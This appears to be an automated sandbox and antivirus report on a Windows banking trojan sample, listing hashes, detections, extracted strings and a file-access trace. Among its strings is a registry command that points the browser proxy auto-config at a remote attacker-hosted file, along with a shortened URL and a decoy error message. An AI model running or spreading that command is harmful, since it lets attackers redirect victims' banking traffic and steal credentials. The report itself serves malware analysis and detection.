Report #9261 check_circle

Binary
DLL
False cancel
Size
35.50KB
trid
47.2% Win32 Executable PureBasic
13.9% Win32 Executable MS Visual C++
12.3% Win64 Executable
11.9% Win32 EXE Yoda's Crypter
5.8% Windows screen saver
type
PE
wordsize
32
Subsystem
Windows GUI
Hashes
md5
3fcb13bc8e648051e53da7f5ab0cc23a
sha1
246aa9087cb512aa5417777680c5a6166d04c4a2
crc32
0x83006a24
sha224
b1f4157888855108c334dd8f28c28812a434ca6f0c1fd1f6e690c169
sha256
6d2a41557f1d43d0ffc4038017bc6a105d08995912b4fbe2b6181a3524544308
sha384
899c262fa316194ac55c21dc7ceab4c763246523f3327b25ee4ab7323e8392a75e6aa49df824dea57ef3964c1d114532
sha512
7a065b3627047884574f92a07b8dec1d0eb0a8ca4e0b8deb63ab5a3dab91961050913567e5d9c62bd130927da8c2fc287c7bf804d09447690a1ff9366ace0781
ssdeep
768:MVdtcAAayQ6I6Ro1dwwGl8940Xq3jk3nhOF:MGAC66Ro/4iq3jJ
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
PureBasic_4x_Neil_Hodgson_additional, PureBasic_4x_Neil_Hodgson, contentis_base64, CRC32_poly_Constant, url, IP, win_files_operation, keylogger, domain, CRC32_table, Microsoft_Visual_Basic_v50, PureBasic4xNeilHodgson, MD5_Constants, IsPE32, IsWindowsGUI, PureBasic

Suspicious
True check_circle

Strings
List
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v AutoConfigURL /t REG_SZ /d "http://webmastertechs.com.br:80/img/m0d.txt" /f
t.Ht
start http://goo.gl/atB7EY
COMCTL32.dll
WindowClass_%d
MSG * "O aplicativo falhou ao iniciar porque framedyn.dll nao foi encontrado"
PA<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <dependency> <dependentAssembly> <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /> </dependentAssembly> </dependency> <v3:trustInfo xmlns:v3="urn:schemas-microsoft-com:asm.v3"> <v3:security> <v3:requestedPrivileges> <!-- level can be "asInvoker", "highestAvailable", or "requireAdministrator" --> <v3:requestedExecutionLevel level="highestAvailable" /> </v3:requestedPrivileges> </v3:security> </v3:trustInfo> </assembly>
_strnicmp
u&SSh2
Falsches Passwort.
Wrong password.
-PB_GadgetStack_%i
GetProcAddress
ExitProcess
GetForegroundWindow
TerminateProcess
ShellExecuteExA
Password
Passwort
Can not create some of your include files.
LoadResource
SetFilePointer
CreateFileA
WriteFile
CreateDirectoryA
DeleteFileA
GetModuleFileNameA
GetKeyState
LoadLibraryA
FreeLibrary
HeapCreate
GetModuleHandleA
An unknown error occured. The program will be terminated.
ReadFile
Sleep
nontinehhas.batP
Please enter the password.
Bitte geben Sie das Passwort ein.
PB_WindowID
tKHtDHt'HucjF_
PB_DropAccept
Continue?
.\BDFINOPS
Fortfahren?
Overwrite?
berschreiben?
berschreiben?
MDI_ChildClass
PB_MDI_Gadget
@echo off
Fehler!
`.rdata
HHtTHt1
Can not allocate the memory.
@.data
Choose a location to save the files.
Error!
Nicht gen
Bitte w
deutsch
Button
.code
gend Speicher verf
gbar.
The file
Die Datei
_rmdir
Static
DSUVW
Ht|H
t'SWV
open
Rich
tLWhh
t1SW
tyVS
SSh1
0123456789abcdef
!This program cannot be run in DOS mode.
Das Programm wird von diesem Betriebssytem nicht unterst
Einige Include Dateien konnten nicht erstellt werden.
Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.
already exists in the current directory. Overwrite?
SHELL32.DLL
SHELL32.dll
existiert bereits im aktuellen Arbeitsverzeichnis.
This program is not supported on this operating system.
hlen Sie einen Ordner zum Speichern der Dateien aus.
Edit
CallWindowProcA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
InitializeCriticalSection
InitCommonControlsEx
InitCommonControls
SetTextColor
GetTempFileNameA
GetTempPathA
GetWindowRect

Foremost
Matches
0.exe, 35 KB
Suspicious
True check_circle
Heuristics
IPs
hasIPs: False cancel
Allowed
Suspicious
hasAllowed: False cancel
hasSuspicious: False cancel

URLs
Allowed
hasURLs: True check_circle
Suspicious: http://webmastertechs.com.br:80/img/m0d.txt, http://goo.gl/atb7ey
hasAllowed: False cancel
hasSuspicious: True check_circle

Files
Allowed: SHLWAPI.dll, SHELL32.dll, COMCTL32.dll, GDI32.dll, MSVCRT.dll, OLE32.dll, USER32.dll, KERNEL32.DLL
hasFiles: True check_circle
Suspicious
hasAllowed: True check_circle
hasSuspicious: False cancel

Binary
Sizes
RVA
RVA: 16
Suspicious: False cancel
Code
Size: 7680
Suspicious: False cancel
Image
Address: 4194304
Suspicious: False cancel
Stack
Stack: 4096
Suspicious: False cancel
Headers
Headers: 4096
Suspicious: False cancel
Suspicious: False cancel

Symbols
Number
Number: 0
Suspicious: True check_circle
Pointer
Pointer: 0
Suspicious: True check_circle
Directories
Number: 16
Suspicious: False cancel

Checksum
Value: 0
Suspicous: True check_circle

Sections
Allowed: .code, .text, .rdata, .data, .rsrc
Suspicious
hasAllowed: True check_circle
hasSections: True check_circle
hasSuspicious: False cancel

Versions
OS
Version: 4
Suspicious: False cancel
Image
Version: True check_circle
Suspicious: 4
Linker
Version: 2.50
Suspicious: False cancel
Subsystem
Version: 4.0
Suspicious: False cancel
Suspicious: False cancel

EntryPoint
Address: 4096
Suspicious: False cancel

Anomalies
Anomalies: The header checksum and the calculated checksum do not match.
hasAnomalies: True check_circle

Libraries
Allowed: shlwapi.dll, shell32.dll, comctl32.dll, gdi32.dll, msvcrt.dll, ole32.dll, user32.dll, kernel32.dll
hasLibs: True check_circle
Suspicious
hasAllowed: True check_circle
hasSuspicious: False cancel

Timestamp
Past: False cancel
Valid: True check_circle
Value: 2010-11-08 11:12:07
Future: False cancel

Compilation
Packed: False cancel
Missing: True check_circle
Packers
Compiled: False cancel
Compilers
MainPacker: PureBasic 4.x -> Neil Hodgson

Obfuscation
XOR: False cancel
Fuzzing: False cancel

PEDetector
Matches
None
Suspicious
False cancel
Disassembly
hasTricks
True check_circle
Tricks
pushpopmath
.text: 2

cpuinstructionsresultscomparison
.rsrc: 1

AVclass
bancos
1
VirusTotal
md5
3fcb13bc8e648051e53da7f5ab0cc23a
sha1
246aa9087cb512aa5417777680c5a6166d04c4a2
SCANS (DETECTION RATE = 64.62%)
AVG
result: FileRepMetagen [Malware]
update: 20180324
version: 18.2.3827.0
detected: True check_circle

CMC
update: 20180323
version: 1.1.0.977
detected: False cancel

MAX
result: malware (ai score=84)
update: 20180324
version: 2017.11.15.1
detected: True check_circle

Bkav
result: W32.BancosND.Trojan
update: 20180322
version: 1.3.0.9466
detected: True check_circle

K7GW
result: Password-Stealer ( 002a6f6a1 )
update: 20180323
version: 10.42.26598
detected: True check_circle

ALYac
result: Trojan.Generic.12326752
update: 20180323
version: 1.1.1.5
detected: True check_circle

Avast
result: FileRepMetagen [Malware]
update: 20180324
version: 18.2.3827.0
detected: True check_circle

Avira
result: TR/Rogue.36352.29
update: 20180323
version: 8.3.3.6
detected: True check_circle

Baidu
result: Win32.Trojan.WisdomEyes.16070401.9500.9731
update: 20180323
version: 1.0.0.2
detected: True check_circle

Cyren
result: W32/Bancos.CUVU-2332
update: 20180324
version: 5.4.30.7
detected: True check_circle

DrWeb
update: 20180324
version: 7.0.28.2020
detected: False cancel

GData
result: Trojan.Generic.12326752
update: 20180324
version: A:25.16483B:25.11862
detected: True check_circle

Panda
result: Trj/CI.A
update: 20180323
version: 4.6.4.2
detected: True check_circle

VBA32
update: 20180323
version: 3.12.28.0
detected: False cancel

VIPRE
result: Trojan.Win32.Generic!BT
update: 20180323
version: 65478
detected: True check_circle

Zoner
update: 20180324
version: 1.0
detected: False cancel

AVware
result: Trojan.Win32.Generic!BT
update: 20180324
version: 1.5.0.42
detected: True check_circle

ClamAV
update: 20180323
version: 0.99.2.0
detected: False cancel

Comodo
update: 20180323
version: 28733
detected: False cancel

F-Prot
result: W32/Bancos.AMFI
update: 20180324
version: 4.7.1.166
detected: True check_circle

Ikarus
result: Trojan.Rogue
update: 20180323
version: 0.1.5.2
detected: True check_circle

McAfee
result: Artemis!3FCB13BC8E64
update: 20180324
version: 6.0.6.653
detected: True check_circle

Rising
update: 20180324
version: 25.0.0.1
detected: False cancel

Sophos
result: Mal/Generic-S
update: 20180323
version: 4.98.0
detected: True check_circle

Yandex
update: 20180323
version: 5.5.1.3
detected: False cancel

Arcabit
update: 20180324
version: 1.0.0.831
detected: False cancel

Cylance
result: Unsafe
update: 20180324
version: 2.3.1.101
detected: True check_circle

Endgame
result: malicious (high confidence)
update: 20180316
version: 2.0.5
detected: True check_circle

Tencent
result: Bat.Trojan-proxy.Banker.Lpcd
update: 20180324
version: 1.0.0.1
detected: True check_circle

ViRobot
update: 20180323
version: 2014.3.20.0
detected: False cancel

eGambit
update: 20180324
version: v4.3.5
detected: False cancel

Ad-Aware
result: Trojan.Generic.12326752
update: 20180324
version: 3.0.3.1010
detected: True check_circle

AegisLab
result: Troj.Proxy.BAT.Banker.h!c
update: 20180323
version: 4.2
detected: True check_circle

Emsisoft
result: Trojan.Generic.12326752 (B)
update: 20180324
version: 4.0.2.899
detected: True check_circle

F-Secure
result: Trojan.Generic.12326752
update: 20180324
version: 11.0.19100.45
detected: True check_circle

Fortinet
update: 20180324
version: 5.4.247.0
detected: False cancel

Invincea
result: heuristic
update: 20180121
version: 6.3.4.26036
detected: True check_circle

Jiangmin
update: 20180324
version: 16.0.100
detected: False cancel

Kingsoft
update: 20180324
version: 2013.8.14.323
detected: False cancel

Paloalto
result: generic.ml
update: 20180324
version: 1.0
detected: True check_circle

Symantec
result: Trojan.Gen.2
update: 20180323
version: 1.5.0.0
detected: True check_circle

nProtect
update: 20180323
version: 2018-03-23.02
detected: False cancel

AhnLab-V3
update: 20180323
version: 3.12.0.20130
detected: False cancel

Antiy-AVL
update: 20180323
version: 3.0.0.1
detected: False cancel

Kaspersky
result: Trojan-Proxy.BAT.Banker.h
update: 20180323
version: 15.0.1.13
detected: True check_circle

Microsoft
update: 20180324
version: 1.1.14600.4
detected: False cancel

Qihoo-360
result: HEUR/QVM05.1.Malware.Gen
update: 20180324
version: 1.0.0.1120
detected: True check_circle

TheHacker
update: 20180319
version: 6.8.0.5.2551
detected: False cancel

ZoneAlarm
result: Trojan-Proxy.BAT.Banker.h
update: 20180324
version: 1.0
detected: True check_circle

ESET-NOD32
update: 20180323
version: 17107
detected: False cancel

TrendMicro
result: TROJ_GEN.R002C0GBI18
update: 20180323
version: 9.862.0.1074
detected: True check_circle

WhiteArmor
update: 20180223
detected: False cancel

BitDefender
result: Trojan.Generic.12326752
update: 20180324
version: 7.2
detected: True check_circle

CrowdStrike
result: malicious_confidence_100% (W)
update: 20170201
version: 1.0
detected: True check_circle

K7AntiVirus
result: Password-Stealer ( 002a6f6a1 )
update: 20180323
version: 10.42.26598
detected: True check_circle

SentinelOne
result: static engine - malicious
update: 20180225
version: 1.0.15.206
detected: True check_circle

Avast-Mobile
update: 20180323
version: 180323-04
detected: False cancel

Malwarebytes
update: 20180323
version: 2.1.1.1115
detected: False cancel

TotalDefense
result: Win32/Banker.ZABS
update: 20180323
version: 37.1.62.1
detected: True check_circle

CAT-QuickHeal
result: TrojanProxy.Banker
update: 20180323
version: 14.00
detected: True check_circle

NANO-Antivirus
result: Trojan.Win32.Bancos.emrzzj
update: 20180324
version: 1.0.100.22043
detected: True check_circle

MicroWorld-eScan
result: Trojan.Generic.12326752
update: 20180324
version: 14.0.297.0
detected: True check_circle

SUPERAntiSpyware
result: Trojan.Agent/Gen-Bancos
update: 20180323
version: 5.6.0.1032
detected: True check_circle

McAfee-GW-Edition
result: BehavesLike.Win32.Downloader.nh
update: 20180323
version: v2015
detected: True check_circle

TrendMicro-HouseCall
result: TROJ_GEN.R002C0GBI18
update: 20180324
version: 9.950.0.1006
detected: True check_circle

total
65
sha256
6d2a41557f1d43d0ffc4038017bc6a105d08995912b4fbe2b6181a3524544308
scan_id
6d2a41557f1d43d0ffc4038017bc6a105d08995912b4fbe2b6181a3524544308-1521853778
resource
3fcb13bc8e648051e53da7f5ab0cc23a
positives
42
scan_date
2018-03-24 01:09:38
verbose_msg
Scan finished, information embedded
response_code
1
File
Trace
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Windows\SysWOW64\shdocvw.dll
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Windows\SysWOW64\shdocvw.dll
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Windows\SysWOW64\shdocvw.dll
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Windows\SysWOW64\shdocvw.dll
11/3/2020 - 11:45:42.793Read1480C:\malware.exeC:\Windows\SysWOW64\shdocvw.dll
11/3/2020 - 11:45:42.793Read1480C:\malware.exeC:\Windows\SysWOW64\shdocvw.dll
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Windows\SysWOW64\shdocvw.dll
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Windows\SysWOW64\shdocvw.dll
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Windows\SysWOW64\shdocvw.dll
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Windows\SysWOW64\shell32.dll
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Windows\SysWOW64\shell32.dll
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Users\Behemot
11/3/2020 - 11:45:42.793Unknown1480C:\malware.exeC:\Users\Behemot
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\
11/3/2020 - 11:45:42.793Unknown1480C:\malware.exeC:\
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Users
11/3/2020 - 11:45:42.793Unknown1480C:\malware.exeC:\Users
11/3/2020 - 11:45:42.793Open1480C:\malware.exeC:\Windows\SysWOW64\urlmon.dll
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Windows\SysWOW64\urlmon.dll
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\version.DLL
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Windows\SysWOW64\version.dll
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Windows\SysWOW64\version.dll
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Secur32.dll
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Windows\SysWOW64\secur32.dll
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Windows\SysWOW64\secur32.dll
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users\Behemot
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Users
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\api-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:42.809Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:42.809Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat:Zone.Identifier
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Write1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Windows\AppPatch\sysmain.sdb
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Read1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.903Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.903Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.918Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\Windows\SysWOW64\cmd.exe
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\Windows\SysWOW64\sfc.dll
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\Windows\SysWOW64\sfc.dll
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\sfc_os.DLL
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\Windows\SysWOW64\sfc_os.dll
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\Windows\SysWOW64\sfc_os.dll
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\Windows\winsxs\FileMaps\users_behemot_appdata_local_temp_ffed.tmp_aaccdcb4d80db2f0.cdf-ms
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\DEVRTL.dll
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\Windows\SysWOW64\devrtl.dll
11/3/2020 - 11:45:42.918Open1480C:\malware.exeC:\Windows\SysWOW64\devrtl.dll
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Windows\AppPatch\pcamain.sdb
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
11/3/2020 - 11:45:42.934Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.bat
11/3/2020 - 11:45:42.934Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Temp\FFED.tmp\nontinehhas.batnontinehhas.bat
